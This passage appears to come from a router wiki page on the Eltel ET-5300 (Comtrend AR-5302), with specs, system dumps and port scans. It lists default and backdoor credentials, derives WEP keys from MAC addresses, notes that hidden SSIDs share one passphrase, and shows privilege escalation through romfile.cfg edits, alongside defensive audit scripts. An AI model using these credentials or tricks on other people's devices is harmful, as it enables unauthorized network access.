Eltel ET-5300
Eltel ET5300 V1
Manuf (OEM/ODM): Comtrend AR5302
Country of manuf.: China
Type: wireless router, dsl modem
Power: 12 VDC, 1 A
Connector type: barrel
CPU1: Ralink RT63365E (500 MHz)
FLA1: 8 MiB (Macronix MX25L6406E)
RAM1: 32 MiB (EtronTech EM6AA160TSB-5G)
Expansion IFs: none specified
WI1 chip1: Ralink RT5390HL
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL
ETH chip1: Ralink RT63365E
Switch: Ralink RT63365E
LAN speed: 100M
LAN ports: 4
WAN speed: 100M
WAN ports: 1
Additional chips: DSL AFE: Ralink RT63087N
Stock FW OS: Linux 2.6.22.15 TrendChip
Default SSID: TURBONETT_XXXXXX
Default IP address: 192.168.1.1
Default login user: admin
Default login password: c1@r0
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
This router is distributed by Claro in large numbers. It is manufactured by Comtrend according to the IEEE Standards MA-L database.
Links
Components
Board, headers, etc
The board layout is somewhat similar to Upvel UR-314AN, Upvel UR-354AN4G (with USB), Huawei HG532s, ZTE ZXHN H108L, and Edimax AR-7186. Silk screen says E241819 50XX13-350.
- J521 is likely the serial interface.
- The circuit board is prepared for a USB connector (J500). It needs an additional 5V regulator (U601).
Images
from User:Zerohero
Info
Bootlog
# cat /proc/kmsg
<5>Linux version 2.6.22.15 (root@linux.local) (gcc version 4.3.4 (GCC) ) #11 SMP Tue Apr 2 09:57:08 CST 2013
<6>ISPRAM0: PA=00260000,Size=00008000,enabled
<4>Enable SRAM=1c000001
<4>Ralink RT63365 SOC prom init
<4>[DEBUG]Fix eth led for AR-5300
<4>CPU revision is: 00019555
<4>Determined physical RAM map:
<4> memory: 02000000 @ 00000000 (usable)
<7>On node 0 totalpages: 8192
<7> Normal zone: 64 pages used for memmap
<7> Normal zone: 0 pages reserved
<7> Normal zone: 8128 pages, LIFO batch:0
<4>3 available secondary CPU TC(s)
<4>Built 1 zonelists. Total pages: 8128
<5>Kernel command line: console=ttyS0 rootfstype=squashfs es=1
<4>Primary instruction cache 64kB, physically tagged, 4-way, linesize 32 bytes.
<4>Primary data cache 32kB, 4-way, linesize 32 bytes.
<6>Synthesized TLB refill handler (23 instructions).
<6>Synthesized TLB load handler fastpath (37 instructions).
<6>Synthesized TLB store handler fastpath (37 instructions).
<6>Synthesized TLB modify handler fastpath (36 instructions).
<6>Cache parity protection disabled
<4>PID hash table entries: 128 (order: 7, 512 bytes)
<4>CPU frequency 498.00 MHz
<4>Using 250.000 MHz high precision timer.
<6>console handover: boot [early0] -> real [ttyS0]
<4>Dentry cache hash table entries: 4096 (order: 2, 16384 bytes)
<4>Inode-cache hash table entries: 2048 (order: 1, 8192 bytes)
<6>Memory: 29276k/32768k available (2338k kernel code, 3492k reserved, 346k data, 148k init, 0k highmem)
<6>SLUB: Genslabs=17, HWalign=32, Order=0-1, MinObjects=4, CPUs=4, Nodes=1
<7>Calibrating delay loop... 332.59 BogoMIPS (lpj=1662976)
<4>Mount-cache hash table entries: 512
<4>34K sync es set to 1.
<4>Config7: 0x80080500
<4>FPU Affinity set after 1105 emulations
<4>Limit of 4 TCs set
<4>TLB of 64 entry pairs shared by 2 VPEs
<4>VPE 0: TC 0 1 2, VPE 1: TC 3
<4>IPI buffer pool of 32 buffers
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 1 going on-line as CPU 1
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.85 BogoMIPS (lpj=1249280)
<4>TC 2 going on-line as CPU 2
<4>CPU revision is: 00019555
<7>Calibrating delay loop... 249.03 BogoMIPS (lpj=1245184)
<4>TC 3 going on-line as CPU 3
<6>Brought up 4 CPUs
<4>migration_cost=10000
<6>NET: Registered protocol family 16
<4>RT63365_pcie_init
<4>registering PCI controller with io_map_base unset
<6>PCI: Bridge: 0000:00:00.0
<6> IO window: disabled.
<6> MEM window: 20000000-200fffff
<6> PREFETCH window: disabled.
<4>PCI: Enabling device 0000:00:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:00:00.0 to 64
<6>NET: Registered protocol family 8
<6>NET: Registered protocol family 20
<6>NET: Registered protocol family 2
<6>Time: MIPS clocksource has been installed.
<4>IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
<4>TCP established hash table entries: 1024 (order: 1, 12288 bytes)
<4>TCP bind hash table entries: 1024 (order: 1, 8192 bytes)
<6>TCP: Hash tables configured (established 1024 bind 1024)
<6>TCP reno registered
<6>squashfs: version 3.0 (2006/03/15) Phillip Lougher
<6>io scheduler noop registered (default)
<6>ttyS0 at I/O 0xbfbf0003 (irq = 1) is a TC3162
<6>PPP generic driver version 2.4.2
<6>PPP Deflate Compression module registered
<6>PPP BSD Compression module registered
<6>NET: Registered protocol family 24
<6>IMQ starting with 2 devices...
<6>IMQ driver loaded successfully.
<6> Hooking IMQ after NAT on PREROUTING.
<6> Hooking IMQ before NAT on POSTROUTING.
<4>tc3162: flash device 0x01000000 at 0x10000000
<6>tc3162: Found SPIFLASH 8MiB MX25L6405D
<5>Creating 7 MTD partitions on "tc3162":
<5>0x00000000-0x00010000 : "bootloader"
<5>0x00010000-0x00020000 : "romfile"
<5>0x00020000-0x00104c6f : "kernel"
<4>mtd: partition "kernel" doesn't end on an erase block -- force read-only
<5>0x00104c6f-0x004c6c6f : "rootfs"
<4>mtd: partition "rootfs" doesn't start on an erase block boundary -- force read-only
<5>0x00020000-0x007c0000 : "tclinux"
<5>0x007c0000-0x00800000 : "reservearea"
<5>0x00000000-0x00800000 : "total_flash"
<4>RT3xxx EHCI/OHCI init.
<4>Netfilter messages via NETLINK v0.30.
<4>nf_conntrack version 0.5.0 (256 buckets, 2048 max)
<4>ctnetlink v0.93: registering with nfnetlink.
<4>nf_conntrack_rtsp v0.6.21 loading
<4>nf_nat_rtsp v0.6.21 loading
<4>ip_tables: (C) 2000-2006 Netfilter Core Team
<6>TCP cubic registered
<6>Initializing XFRM netlink socket
<6>NET: Registered protocol family 1
<6>NET: Registered protocol family 10
<6>lo: Disabled Privacy Extensions
<6>IPv6 over IPv4 tunneling driver
<6>sit0: Disabled Privacy Extensions
<6>NET: Registered protocol family 17
<6>NET: Registered protocol family 15
<6>802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com>
<6>All bugs added by David S. Miller <davem@redhat.com>
<4>VFS: Mounted root (squashfs filesystem) readonly.
<6>Freeing unused kernel memory: 148k freed
<4>module_sel: module license 'unspecified' taints kernel.
<4>
<4>tcfullcone version: tcfullcone V1.1.0.0 (Mar 5 2012-08:25:25).
<4>TC3162 LED Manager 0.1 init
<4>
<4>tcledctrl version: tcledctrl V1.1.0.0 (Apr 2 2013-09:57:18).
<4>tccicmd V1.1.0.0 (Apr 2 2013-09:57:20)
<4>Adapter_Interrupts_Init: Successfully hooked IRQ 29
<4>
<4>Adapter_Interrupts_Init: call back registeredAdapter_EIP93_Init: CmdRing_Handle=81860ffc
<4>Adapter_EIP93_Init: ResRing_Handle=81860ff8
<4>Adapter: Successfully initialized EIP93v2 in ARM mode
<4>PEC_Init: PRNG is initialized
<6>femac.c:v1.00-NAPI 29.Mar.2011
<6>eth0: FE MAC Ethernet address: F8:8E:85:9C:5E:F4
<4>TSARM: TC3162 ATM SAR driver 1.5 init
<4>
<4>tc3162sar V1.2.0.0 (Apr 2 2013-09:57:16)
<4>register autopvc cmd to sys
<4>TSARM: TC3162 ATM SAR driver 1.5 done
<4>ADSL DMT initialization starting
<4>Begin AdslTaskInit.....
<4>End AdslTaskInit
<4>Begin to request IRQ 20
<4>DMT:Succeed to request IRQ 20
<4>Initializing ADSL F/W 3.20.6.0 ......
<4>Initializing ADSL F/W ........ done
<4>ADSL HW version: b2, HCLK 166
<4>largeD flag=2 (0:maxD=64, 1:maxD=128, 2:maxD=511)
<4>SRAON
<4>up right away
<4>
<4>tcsmux version: tcsmux V1.1.0.0 (Mar 5 2012-08:25:29).
<4>
<4>tcportbind version: tcportbind V1.1.0.0 (Mar 5 2012-08:25:32).
<4>vlantag_drv_init
<4>the number of cfg node is 68
<4>portbind_init
<4>autopvc_init
<4>logAccess_init LanguageSwitch_init vendorCfgFile_init The number of cache node is 5
<4>WPSActiveStatus = NULL
<4>WPSOOBActive = NULL
<4>ReCounterActive = NULL
<4>WPSGenPinCode = NULL
<4>sslca_write:get Frag Number failed!
<4>The attribute is not in wifiMACTab
<4>
<4>lanHost_read: Create node LanHost !
<4>The remaining IMEM space cannot accommodate section .text.imem !!
<4>Remaining IMEM space: -2280 bytes Section Size: 728 bytes
<4>PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
<7>PCI: Setting latency timer of device 0000:01:00.0 to 64
<4>Mirror/redirect action on
<5>Ebtables v2.0 registered
<4>igmpsnoop V1.1.0.0 (Mar 5 2012-08:25:26)
<4>
<4>mldsnooping V1.1.0.0 (Mar 5 2012-08:25:28)
<6>eth0: starting interface.
<4>alloc_sram p=bc000800 free=7800
<4>alloc_sram p=bc002800 free=5800
<4>[macInit:2049]Fix eth led for AR-5300
<4>TC2105MJ,
<6>Ralink HW NAT Module Enabled
<6>device eth0 entered promiscuous mode
<4>0x1300 = 00064380
<4>jiffies=ffff9274, POLLING_MODE_DETECT_INTV=300
<6>device ra0 entered promiscuous mode
<6>device ra1 entered promiscuous mode
<6>device ra2 entered promiscuous mode
<6>device ra3 entered promiscuous mode
<4>
<4>Enabling SSL security system
<4>SSL security system enabled
<7>eth0.1: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.1: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.2: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.2: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.3: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.3: add 01:00:5e:00:00:01 mcast address to master interface
<7>eth0.4: add 33:33:00:00:00:01 mcast address to master interface
<7>eth0.4: add 01:00:5e:00:00:01 mcast address to master interface
<6>device eth0 left promiscuous mode
<6>br0: port 1(eth0) entering disabled state
<4>ANNEXAIJLM
<4>========================insmod iptable_filter=======================
<6>br0: port 9(eth0.4) entering learning state
<6>br0: port 8(eth0.3) entering learning state
<6>br0: port 7(eth0.2) entering learning state
<6>br0: port 6(eth0.1) entering learning state
<6>br0: port 5(ra3) entering learning state
<6>br0: port 4(ra2) entering learning state
<6>br0: port 3(ra1) entering learning state
<6>br0: port 2(ra0) entering learning state
<6>br0: topology change detected, propagating
<6>br0: port 9(eth0.4) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 8(eth0.3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 7(eth0.2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 6(eth0.1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 5(ra3) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 4(ra2) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 3(ra1) entering forwarding state
<6>br0: topology change detected, propagating
<6>br0: port 2(ra0) entering forwarding state
<4>Radvd function activated!
<4>Enter set first loop, IP addr by radvd
<4>dhcp6s parameter activated by exec!
<4>read WLAN driver from rt_device failed,set with default value!
<4>
<4>Enter cwmp boot, we will start tr69 Process
<4>Parental Control: parental_execute() Enter.
<4>[discovery:613]ifName=nas2, 88:43:e1:07:56:18:55679
<6>br0: starting userspace STP failed, staring kernel STP
<4>Link State: LAN_1 up.
<4>Failed to ioctl br0:0
<7>nas0: no IPv6 routers present
<4>ThreadedTimerCheck: get last for first time
<4>Failed to ioctl br0:0
<7>nas2: no IPv6 routers present
Bootloader
# cfeversion
1.0-004
Strings extracted from bootloader partition:
# cat /dev/mtd0
BootVer:1.0-004
TrendChip Technologies Corp.
ADSL Modem
admin
1234
AR-5302
Firmware
# version
T111-73376CAR-C01_R10
Model
# model
AR-5302
Board ID
# boardid
Board ID = AR-5302
Operating system
# uname -a
Linux tc 2.6.22.15 #11 SMP Tue Apr 2 09:57:08 CST 2013 mips unknown
Build
# build
Build Time: Apr 02 2013 10:04:17
Modules
# cat /proc/modules
ipt_REDIRECT 800 2 - Live 0xc0156000
iptable_filter 1024 1 - Live 0xc0150000
hw_nat 50256 0 - Live 0xc018a000 (P)
mldsnooping 5088 0 - Live 0xc0158000
igmpsnoop 12256 0 - Live 0xc015b000
ebtable_nat 1024 1 - Live 0xc014e000
ebtable_broute 832 1 - Live 0xc009d000
ebt_ip6 2496 0 - Live 0xc0083000
ebt_ip 1952 0 - Live 0xc0099000
ebtable_filter 992 0 - Live 0xc0081000
ebtables 19744 5 ebtable_nat,ebtable_broute,ebt_ip6,ebt_ip,ebtable_filter, Live 0xc0075000
sch_prio 3744 2 - Live 0xc0059000
sch_htb 15328 0 - Live 0xc007c000
cls_fw 3392 2 - Live 0xc0057000
act_mirred 2704 2 - Live 0xc0055000
rt5390ap 815936 4 - Live 0xc028a000 (P)
brg_shortcut 4816 0 - Live 0xc002a000 (P)
tcvlantag 10080 0 - Live 0xc0071000
tcportbind 3856 0 - Live 0xc0039000
tcsmux 8912 0 - Live 0xc006d000
tc3162_dmt 820720 0 [permanent], Live 0xc01c0000 (P)
tc3162l2sar 61568 2 - Live 0xc0088000 (P)
raeth 58400 2 tc3162_dmt,tc3162l2sar, Live 0xc0042000 (P)
crypto_k 28000 0 - Live 0xc0031000 (P)
tccicmd 67232 4 rt5390ap,tc3162_dmt,tc3162l2sar,raeth, Live 0xc005b000 (P)
tcledctrl 20736 4 rt5390ap,tc3162l2sar,raeth,tccicmd, Live 0xc003b000 (P)
tcfullcone 2160 0 - Live 0xc002f000
module_sel 1312 4 rt5390ap,tcvlantag,tcportbind,tcsmux, Live 0xc002d000 (P)
MTDs
# cat /proc/mtd
dev:    size   erasesize  name
mtd0: 00010000 00010000 "bootloader"
mtd1: 00010000 00010000 "romfile"
mtd2: 000e4c6f 00010000 "kernel"
mtd3: 003c2000 00010000 "rootfs"
mtd4: 007a0000 00010000 "tclinux"
mtd5: 00040000 00010000 "reservearea"
mtd6: 00800000 00010000 "total_flash"
Filesystems
# cat /proc/filesystems
nodev   rootfs
nodev   bdev
nodev   proc
nodev   sockfs
nodev   pipefs
nodev   anon_inodefs
nodev   futexfs
nodev   tmpfs
nodev   devpts
        squashfs
nodev   ramfs
Mounts
# cat /proc/mounts
rootfs / rootfs rw 0 0
/dev/root / squashfs ro 0 0
proc /proc proc rw 0 0
ramfs /tmp ramfs rw 0 0
devpts /dev/pts devpts rw 0 0
IOmem
# cat /proc/iomem
00000000-01ffffff : System RAM
  00020000-002688e7 : Kernel code
  002688e8-002bf19f : Kernel data
1fba0000-1fbaffff : rt3xxx-ohci
1fbb0000-1fbbffff : rt3xxx-ehci
20000000-2fffffff : pcie memory space
  20000000-200fffff : PCI Bus #01
    20000000-2000ffff : 0000:01:00.0
      20000000-2000ffff : 0000:01:00.0
IOports
# cat /proc/ioports
1f600000-1f61ffff : pcie IO space
CPUs
# cat /proc/cpuinfo
system type             : Ralink RT63365 SOC
processor               : 0
cpu model               : MIPS 34K V5.5
BogoMIPS                : 332.59
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp mt
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available
unaligned accesses      : 227088

processor               : 1
cpu model               : MIPS 34K V5.5
BogoMIPS                : 249.85
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp mt
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available
unaligned accesses      : 227088

processor               : 2
cpu model               : MIPS 34K V5.5
BogoMIPS                : 249.85
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp mt
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available
unaligned accesses      : 227088

processor               : 3
cpu model               : MIPS 34K V5.5
BogoMIPS                : 249.03
wait instruction        : yes
microsecond timers      : yes
tlb_entries             : 64
extra interrupt vector  : yes
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp mt
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available
unaligned accesses      : 227088
Interrupts
# cat /proc/interrupts
           CPU0       CPU1       CPU2       CPU3
  1:       4717      10601       1043          0      MIPS  TC3162 UART
  9:         84         11        546       1158      MIPS  SMTC_IPI
 10:          0          0          0          0      MIPS  watchdog
 14:          0          0          0          0      MIPS  performance
 20:    1259488    1817925      92279          0      MIPS  dmt20
 22:          0          0          0       2632      MIPS  eth0
 23:          0          0          0          0      MIPS  TSARM
 25:      23156      34192       1825          0      MIPS  ra0
 29:          0          0          0          0      MIPS  safenet-vdriver-eip93
 31:     204088      41065       6946     251974      MIPS  timer
 33:          0          0          0          0      MIPS  bus timeout
ERR:          0
LAN MAC
# mac
MAC Addr: F8:8E:85:9C:5E:F4
Netstat
# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:5555                  *:*                     LISTEN
tcp        0      0 *:domain                *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:7547                  *:*                     LISTEN
tcp        0      0 192.168.1.1:ssh         192.168.1.2:58897       ESTABLISHED
tcp        0      0 *:http                  *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:domain                *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN
udp        0      0 *:sd                    *:*
udp        0      0 *:domain                *:*
udp        0      0 *:bootps                *:*
udp        0      0 *:1900                  *:*
udp        0      0 *:32768                 *:*
udp        0      0 *:dhcpv6-server         *:*
udp        0      0 *:domain                *:*
udp        0      0 *:tftp                  *:*
raw        0      0 *:58                    *:*                     0
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  2      [ ACC ]     STREAM     LISTENING     523    /tmp/tcapi_sock
unix  2      [ ]         DGRAM                    2107
unix  3      [ ]         STREAM     CONNECTED     2089
unix  3      [ ]         STREAM     CONNECTED     2088
unix  2      [ ]         STREAM     CONNECTED     1288
unix  2      [ ]         STREAM     CONNECTED     1284   /tmp/tcapi_sock
Portscan (from Internet)
$ nmap -sS xx.xx.xx.xx

Starting Nmap 6.00 ( http://nmap.org ) at 2014-09-07 19:04 CDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.44s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   open     domain
80/tcp   filtered http
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
161/tcp  filtered snmp
443/tcp  open     https
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
4444/tcp filtered krb524
5555/tcp open     freeciv

Nmap done: 1 IP address (1 host up) scanned in 32.65 seconds
Stimulating port 5555 (from Internet)
$ nc xx.xx.xx.xx 5555
get
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, POST, PUT
Content-Length: 0
Server: RomPager/4.07 UPnP/1.0
See Wikipedia: Universal_Plug_and_Play Access_from_the_Internet
and Full Disclosure: RomPager/4.07 UPnP/1.0. Issue: a reboot can be caused when a specially crafted HTTP request is sent.
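An exposure check that joins the netstat listener list above with the Internet-side nmap result, so the wildcard-bound services that are actually reachable from outside stand out. This is an added example, not code from the page or the vendor; the sample rows are transcribed from the two outputs above, and the risk notes are this editor's assessment of the services documented on this page.

```python
import re

# Constructed sample: rows transcribed from the "netstat -a" output above.
NETSTAT_SAMPLE = """\
tcp        0      0 *:5555                  *:*                     LISTEN
tcp        0      0 *:domain                *:*                     LISTEN
tcp        0      0 *:ssh                   *:*                     LISTEN
tcp        0      0 *:7547                  *:*                     LISTEN
tcp        0      0 192.168.1.1:ssh         192.168.1.2:58897       ESTABLISHED
tcp        0      0 *:http                  *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN
udp        0      0 *:tftp                  *:*
udp        0      0 *:1900                  *:*
"""

# Constructed sample: rows transcribed from the Internet-side "nmap -sS" above.
NMAP_SAMPLE = """\
21/tcp   filtered ftp
22/tcp   filtered ssh
23/tcp   filtered telnet
53/tcp   open     domain
80/tcp   filtered http
443/tcp  open     https
5555/tcp open     freeciv
"""

# Service names as busybox netstat prints them, mapped back to port numbers.
SERVICE_PORTS = {"ftp": 21, "ssh": 22, "telnet": 23, "domain": 53, "tftp": 69,
                 "bootps": 67, "http": 80, "https": 443}

# Why a listener matters on this device (editor's notes, tied to this page's sections).
RISK_NOTES = {
    21: "ftp: cleartext credentials; any upload reboots the device (Vulnerabilities)",
    23: "telnet: cleartext credentials",
    69: "tftp: unauthenticated; a modified romfile.cfg is accepted (Vulnerabilities)",
    1900: "SSDP discovery for UPnP",
    5555: "RomPager/4.07 UPnP: crafted request can reboot the device",
    7547: "TR-069 CWMP management endpoint",
}

def parse_netstat(text):
    """Return {(proto, port)} for sockets bound to the wildcard address '*'."""
    listeners = set()
    for line in text.splitlines():
        m = re.match(r"(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\S+)\s", line)
        if not m:
            continue
        proto, addr, svc = m.groups()
        if addr != "*":            # bound to one address only, skip
            continue
        port = int(svc) if svc.isdigit() else SERVICE_PORTS.get(svc)
        if port is not None:
            listeners.add((proto, port))
    return listeners

def parse_nmap_open(text):
    """Return {(proto, port)} that the external scan reported as 'open'."""
    return {(m.group(2), int(m.group(1)))
            for line in text.splitlines()
            if (m := re.match(r"(\d+)/(tcp|udp)\s+open\s", line))}

def exposure_report(netstat_text, nmap_text):
    """Classify each wildcard listener: INTERNET, filtered/closed, or unscanned (UDP)."""
    reachable = parse_nmap_open(nmap_text)
    report = []
    for proto, port in sorted(parse_netstat(netstat_text), key=lambda x: (x[1], x[0])):
        if proto == "udp":
            scope = "unscanned"    # nmap -sS probes TCP only; UDP exposure stays unknown
        elif (proto, port) in reachable:
            scope = "INTERNET"
        else:
            scope = "filtered/closed"
        report.append((port, proto, scope, RISK_NOTES.get(port, "")))
    return report

if __name__ == "__main__":
    for port, proto, scope, note in exposure_report(NETSTAT_SAMPLE, NMAP_SAMPLE):
        print(f"{port:>5}/{proto}  {scope:<16} {note}")
```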
Processes
# ps
  PID  Uid     VmSize Stat Command
    1 admin       452 S   init
    2 admin           SW< [kthreadd]
    3 admin           SW< [migration/0]
    4 admin           SWN [ksoftirqd/0]
    5 admin           SW< [migration/1]
    6 admin           SWN [ksoftirqd/1]
    7 admin           SW< [migration/2]
    8 admin           SWN [ksoftirqd/2]
    9 admin           SW< [migration/3]
   10 admin           SWN [ksoftirqd/3]
   11 admin           SW< [events/0]
   12 admin           SW< [events/1]
   13 admin           SW< [events/2]
   14 admin           SW< [events/3]
   15 admin           SW< [khelper]
   16 admin           SW< [kblockd/0]
   17 admin           SW< [kblockd/1]
   18 admin           SW< [kblockd/2]
   19 admin           SW< [kblockd/3]
   20 admin           SW  [pdflush]
   21 admin           SW  [pdflush]
   22 admin           SW< [kswapd0]
   23 admin           SW< [aio/0]
   24 admin           SW< [aio/1]
   25 admin           SW< [aio/2]
   26 admin           SW< [aio/3]
   27 admin           SW< [mtdblockd]
   94 admin           SW< [dmtd]
  144 admin      1300 S   /userfs/bin/cfg_manager
  146 admin      1300 S   /userfs/bin/cfg_manager
  147 admin      1300 S   /userfs/bin/cfg_manager
  318 admin           SW  [RtmpCmdQTask]
  319 admin           SW  [RtmpWscTask]
  368 admin       216 S   tcwdog -t 1 /dev/watchdog
  372 admin       144 S   utelnetd -l /bin/login -d
  379 admin       676 S   /userfs/bin/boa -c /boaroot -d
  677 admin       304 S   br2684ctl -c 0 -e 0 -t ubr -p 0 -a 0.0.32
  691 admin       632 S   pppd unit 0 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas0 defaultroute noipdefault persist mtu 1492 mru 1492
  787 admin       304 S   br2684ctl -c 2 -e 0 -t ubr -p 0 -a 0.0.45
  801 admin       636 S   pppd unit 2 user claro password claro nodetach holdoff 4 maxfail 0 usepeerdns lcp-echo-interval 30 lcp-echo-failure 3 plugin libpppoe.so nas2 defaultroute noipdefault persist mtu 1492 mru 1492
 1007 admin       440 S   /userfs/bin/radvd -C /etc/radvd.conf -p /var/run/radvd.pid
 1015 admin       452 S   /userfs/bin/dhcp6s -c /etc/dhcp6s.conf br0 -p /var/run/dhcp6s.pid
 1039 admin       420 S   /usr/sbin/udhcpd
 1049 admin       424 S   /userfs/bin/dnsmasq
 1053 admin      1224 S   /userfs/bin/tr69
 1235 admin       312 S   /userfs/bin/inetd
 1248 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf
 1249 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf
 1250 admin       180 R   /userfs/bin/tftpd
 1251 admin       504 S   /userfs/bin/siproxd --config /etc/alg/siproxd.conf
 1256 admin      1224 S   /userfs/bin/tr69
 1257 admin      1224 S   /userfs/bin/tr69
 1279 admin       332 S   init
 1508 admin       616 R   /userfs/bin/dropbear -i
 1513 admin       492 R   -sh
DNSmasq
# dnsmasq --version
Dnsmasq version 2.52  Copyright (c) 2000-2010 Simon Kelley
Compile time options IPv6 GNU-getopt no-RTC no-DBus no-I18N no-DHCP no-TFTP
Dropbear
# dropbear -v
Unknown argument -v
Dropbear sshd v0.52
EBtables
# ebtables --version
ebtables v2.0.8-2 (May 2007)
Wireless access
In the following description XXXXXX stands for the last 3 octets (in upper case) of the LAN MAC (e.g. LAN MAC F8:8E:85:9C:5E:F4 --> XXXXXX=9C5EF4). The WLAN MAC is the LAN MAC +1 (e.g. F8:8E:85:9C:5E:F5) and the WAN MAC is the LAN MAC +2 (e.g. F8:8E:85:9C:5E:F6).
- Default SSID: TURBONETT_XXXXXX (e.g. TURBONETT_9C5EF4)
- Default WEP key: made of the last 5 octets (in upper case) of the LAN MAC. It can easily be constructed, as the OUI is always F8:8E:85 (e.g. WEP key=8E859C5EF4).
The router supports 4 WLANs in total. By default SSID2-4 are hidden but active (see screenshots), and can be identified by a specific OUI. SSID2-4 credentials are rarely changed by users, and wireless access is gained easily as the defaults are straightforward!
WLAN2
- Default SSID: TURBONETT_XXXXXX-1 (e.g. TURBONETT_9C5EF4-1)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: FA:8E:85
WLAN3
- Default SSID: TURBONETT_XXXXXX-2 (e.g. TURBONETT_9C5EF4-2)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: FE:8E:85
WLAN4
- Default SSID: TURBONETT_XXXXXX-3 (e.g. TURBONETT_9C5EF4-3)
- Default WPA/WPA2 passphrase: 1234567890
- OUI: 02:8E:85
Router login
Login to the ET-5300 is possible using the following protocols.
- Web interface: http and https (invalid certificate)
- Console login: telnet and ssh
- File transfer: tftp and ftp (root directory is /var/tmp)
Many routers distributed by the Claro company use a standard default login, and the ET-5300 is no exception.
- Default username: admin
- Default password: c1@r0
The ET-5300 supports 3 login names in total, but only the password for login1 (admin) can be changed in the web interface.
- The following credentials for login2 and login3 are taken from the romfile.cfg.
- login3 works for the web interface (on a subset of the functionality) and for console ssh login!
Login2
- Username: qwertyuiop
- Password: 1234567890
Login3
- Username: user3
- Password: 1234567890
(P.S. The Sitecom WLM-3500 is affected by the same backdoor accounts [1]. Another candidate might be the Aztech DSL5001EN [2].)
Romfile
The router's configuration can be saved to the XML formatted romfile.cfg (web interface: Maintenance >> Firmware >> Configuration Backup or simply http://192.168.1.1/romfile.cfg). Editing and then restoring the romfile.cfg offers extended configuration possibilities. Here are some ideas...
Login Credentials
As described above, login2 and login3 have some impractical usernames and passwords. This can be corrected by modifying the parameters of Entry1 and Entry2 (think of better passwords than in this example). The new credentials do work for the web interface and console ssh logins!
<Entry1 username="user2" web_passwd="1234"
<Entry2 username="user3" web_passwd="1234"
Display Mask
Logging in as user2 or user3 offers a web interface with reduced menus and permissions:
Note that for both users the Firmware menu is still accessible, which means one can still back up and restore the router's configuration. This allows user2 and user3 to gain full permissions! As seen in the romfile.cfg, permissions are defined by the so-called display_mask:
<Entry0 display_mask="DF FF F7 BF FF DF FF FF FF"
<Entry1 display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C"
<Entry2 display_mask="5E 8C 6 8C 8C 8C 8C 8C 8C"
In the following example the display_mask of user3 is not just copied from admin but set to the maximum possible value. Surprisingly this reveals an additional Advanced Wireless menu, as seen in the screenshots below!
<Entry2 username="user3" web_passwd="1234" display_mask="FF FF FF FF FF FF FF FF FF"
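A small audit over a saved romfile.cfg that parses the <Account> entries and flags the conditions this section describes: accounts still carrying the default credentials documented on this page, short web passwords, and a non-admin display_mask that sets bits the admin mask does not (read here as "menu visible", which is an assumption drawn from the masks quoted above). This is an added example, not the router's own code; the sample fragment is constructed from the entries quoted above, with closing tags added.

```python
import re

# Constructed sample in the shape of the <Account> entries quoted on this page
# (the real romfile.cfg has many more sections and attributes).
ROMFILE_SAMPLE = """\
<Account>
  <Entry0 username="admin" web_passwd="c1@r0" console_passwd="c1@r0"
          display_mask="DF FF F7 BF FF DF FF FF FF" />
  <Entry1 username="qwertyuiop" web_passwd="1234567890"
          display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C" />
  <Entry2 username="user3" web_passwd="1234"
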